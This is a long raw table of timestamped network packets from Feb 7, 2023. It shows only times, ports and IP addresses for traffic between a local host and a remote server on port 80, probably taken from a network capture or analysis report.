                                                                                    Feb 7, 2023 19:44:50.809520006 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.809535980 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.809550047 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.809566021 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.809587955 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.809595108 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.809621096 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.809634924 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.809664965 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.809672117 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.809684038 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.809701920 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.809714079 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.809731960 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.809745073 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.809762001 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.809788942 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.809789896 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.809813023 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.809824944 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.809835911 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.809865952 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.809876919 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.809894085 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.809917927 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.809923887 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.809952021 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.809974909 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.809978962 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.810008049 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.810010910 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.810036898 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.810056925 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.810065031 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.810077906 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.810095072 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.810112000 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.810123920 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.810141087 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.810153961 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.810170889 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.810199976 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.810209036 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.810231924 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.810255051 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.810271978 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.810273886 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.810308933 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.810334921 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.810336113 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.810367107 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.810368061 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.810398102 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.810400009 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.810427904 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.810427904 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.810447931 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.810457945 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.810482025 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.810502052 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.810506105 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.810535908 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.810549021 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.810566902 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.810580015 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.810599089 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.810616016 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.810627937 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.810643911 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.810666084 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.810677052 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.810718060 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.810745955 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.810748100 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.810776949 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.810796976 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.810806036 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.810815096 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.810834885 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.810844898 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.810868979 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.810898066 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.810905933 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.810920000 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.810956955 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.810992002 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.810997963 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.811012030 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.811021090 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.811048031 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.811065912 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.811075926 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.811105013 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.811134100 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.811139107 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.811139107 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.811168909 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.811178923 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.811211109 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.811218977 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.811233997 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.811239958 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.811269999 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.811283112 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.811297894 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.811326981 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.811333895 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.811356068 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.811368942 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.811397076 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.811414003 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.811429977 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.811429024 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.811460018 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.811471939 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.811487913 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.811517954 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.811522961 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.811544895 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.811552048 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.811583042 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.811598063 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.811619997 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.811650038 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.811662912 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.811678886 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.811707020 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.811714888 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.811737061 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.811762094 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.811773062 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.811789989 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.811806917 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.811830044 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.811841965 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.811862946 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.811880112 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.811908007 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.811908007 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.811932087 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.811938047 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.811959982 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.811971903 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.811996937 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.812014103 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.812026024 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.812043905 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.812067986 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.812072992 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.812100887 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.812103033 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.812133074 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.812158108 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.812169075 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.812203884 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.812211990 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.812242985 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.812253952 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.812271118 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.812294960 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.812302113 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.812330961 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.812340975 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.812357903 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.812366009 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.812395096 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.812397957 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.812422037 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.812427044 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.812452078 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.812457085 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.812480927 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.812488079 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.812509060 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.812515974 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.812544107 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.812551022 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.812577009 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.812581062 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.812602997 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.812611103 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.812634945 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.812649012 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.812678099 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.812684059 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.812705994 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.812705994 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.812735081 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.812745094 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.812776089 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.812778950 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.812799931 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.812812090 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.812836885 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.812846899 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.812875986 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.812876940 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.812907934 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.812931061 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.812937975 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.812973976 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.812974930 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.813009977 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.813023090 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.813045025 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.813049078 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.813074112 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.813082933 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.813105106 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.813107967 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.813133955 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.813143015 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.813159943 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.813184023 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.813200951 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.813215017 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.813236952 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.813244104 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.813271999 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.813296080 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.813302994 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.813338041 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.813347101 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.813350916 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.813381910 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.813394070 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.813411951 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.813437939 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.813452005 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.813467026 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.813484907 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.813498020 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.813499928 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.813520908 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.813545942 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.813574076 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.813590050 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.813602924 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.813611031 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.813632011 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.813641071 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.813659906 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.813662052 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.813688993 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.813693047 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.813710928 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.813738108 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.813750982 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.813769102 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.813798904 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.813801050 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.813827038 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.813827038 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.813857079 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.813884020 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.813896894 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.813927889 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.813929081 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.813941956 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.813957930 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.813986063 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.813999891 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.814016104 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.814043045 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.814043999 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.814070940 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.814074039 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.814107895 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.814111948 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.814143896 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.814150095 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.814178944 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.814183950 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.814208984 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.814224958 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.814237118 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.814238071 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.814271927 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.814275026 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.814294100 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.814316988 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.814336061 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.814348936 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.814369917 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.814379930 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.814409018 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.814435959 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.814450026 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.814472914 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.814508915 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.814512968 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.814538002 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.814558029 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.814565897 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.814596891 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.814601898 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.814626932 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.814634085 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.814671040 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.814671993 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.814711094 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.814723969 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.814738035 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.814752102 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.814779997 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.814786911 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.814809084 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.814812899 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.814836025 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.814843893 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.814860106 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.814882040 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.814909935 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.814912081 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.814937115 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.814945936 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.814966917 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.814970970 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.814995050 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.815006971 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.815036058 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.815040112 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.815069914 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.815073013 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.815093040 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.815098047 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.815125942 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.815126896 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.815151930 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.815157890 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.815188885 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.815207005 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.815222979 CET4969880192.168.2.377.73.134.27
